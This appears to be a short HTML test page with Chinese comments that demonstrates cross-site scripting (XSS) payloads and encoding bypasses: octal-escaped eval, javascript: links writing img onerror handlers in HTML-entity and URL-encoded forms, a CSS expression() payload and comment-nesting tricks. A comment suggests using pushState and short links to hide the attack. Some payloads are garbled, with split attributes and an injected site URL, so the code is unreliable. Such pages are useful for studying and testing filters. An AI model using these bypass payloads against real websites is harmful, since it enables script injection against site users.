<html><head><script>//function(<text>a{[]}lert(‘x‘)</text>)()document.write(‘ &lt;img src=http://www.mamicode.com/@ one rror=alert(123) /> ‘);    //说明直接在<script>标签 不会解码HtmlEncodeeval("\141\154\145\162\164\50\47\61\47\51");    //转换为16进制或8进制</script></head><body><pre><a href="javascript:alert(1)=html">click me1</a><a href="javascript:document.write(‘ &lt;img src=http://www.mamicode.com/@ one rror=alert(123) /> ‘);">click me2</a>    说明JS对HtmlEncode进行解码<a href="javascript:document.write(‘ <img src=http://www.mamicode.com/@ one rror=alert(123) /> ‘);">click me3</a><a href="javascript:document.write(‘ %3C%69%6D%67%20%73%72%63%3D%40%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%31%32%33%29%20%2F%3E ‘);">click me4</a><a href="javascript:document.write(‘ %26%6C%74%3B%69%6D%67%20%73%72%63%3D%40%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%31%32%33%29%20%2F%26%67%74%3B ‘);">click me5</a> 4,5对比，说明JS对unicode, 十六进制，十进制，URL解码 只会解码一次。<XsS style="xssb:expression(alert(‘XsSb‘))">由于某些浏览器对XHTML支持，可以插入svg代码，XML代码。111<!-- 222 <!-- 333 --> 444-->555    对于注释的闭合，绕过HTML5中的history的pushState 和 replaceState 无刷新替换URL中链接， 再结合短链接， XSS攻击过程无任何察觉。</pre></body></html>